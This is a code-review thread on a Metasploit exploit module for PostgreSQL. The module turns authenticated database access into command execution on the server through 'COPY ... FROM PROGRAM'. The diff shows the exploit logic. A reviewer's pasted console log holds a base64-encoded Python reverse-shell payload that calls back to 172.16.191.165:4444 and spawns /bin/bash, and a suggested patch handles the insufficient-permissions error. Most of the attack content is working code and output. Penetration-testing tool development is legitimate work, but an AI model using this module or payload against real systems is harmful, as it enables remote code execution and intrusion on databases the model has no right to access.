modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb

```diff
@@ -0,0 +1,248 @@
+    version_match['minor_version']
+  end
+
+  def check
+    vuln_version? ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def vuln_version?
+    version = postgres_fingerprint
+    return false unless version[:auth]
+    version_full = postgres_version(version[:auth])
+    major_version = version_full[0]
+    minor_version = version_full[1]
+    print_status(major_version)
+    print_status(minor_version)
+    if major_version && major_version.to_i > 9 # If major above 9, return true
+      return true
+    end
+    if major_version && major_version.to_i == 9 # If major version equals 9, check for minor 3
+      if minor_version && minor_version.to_i >= 3 # If major 9 and minor 3 or above return true
+        return true
+      end
+    end
+    false
+  end
+
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
+    else
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def execute_payload
+    # Drop table if it exists
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Create Table
+    query = "CREATE TABLE #{tablename}(filename text);"
+    create_query = postgres_query(query)
+    case create_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} created successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Copy Command into Table
+    if command != '' # Use command if its not empty, example powershell web_delivery download cradle. Needed for windows because NETWORK SERVICE doesnt have write to disk privs, need to execute in memory
+      cmd_filtered = command.gsub("'", "''")
+    else #Otherwise use the set payload, linux suggested is to use cmd/unix/reverse_perl
+      cmd_filtered = payload.encoded.gsub("'", "''")
+    end
+    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    copy_query = postgres_query(query)
+    case copy_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
```

Comment:
Here's an additional error message, indicating that the user has insufficient permissions.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'DROP TABLE IF EXISTS msftesttable;'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable dropped successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'CREATE TABLE msftesttable(filename text);'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable created successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'COPY msftesttable FROM PROGRAM 'python -c "exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))"';'
{:sql_error=>"VERROR SQL statement 'COPY msftesttable FROM PROGRAM 'python -c \"exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))\"';' returns #<RuntimeError: ERROR\tVERROR\tC42501\tMmust be superuser to COPY to or from an external program\tHAnyone can COPY to stdout or from stdin. psql's \\copy command also works for anyone.\tFcopy.c\tL802\tRDoCopy>"}
[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'python -c "exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))"';
[*] 127.0.0.1:5432 - Exploit Failed
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - Disconnected
[*] Exploit completed, but no session was created.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

```suggestion
      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
        print_error 'Insufficient permissions'
        return false
      end
      print_warning "#{peer} - Unable to execute query: #{query}"
```

Reply:
Resolved & expanded on the Insufficient permissions message.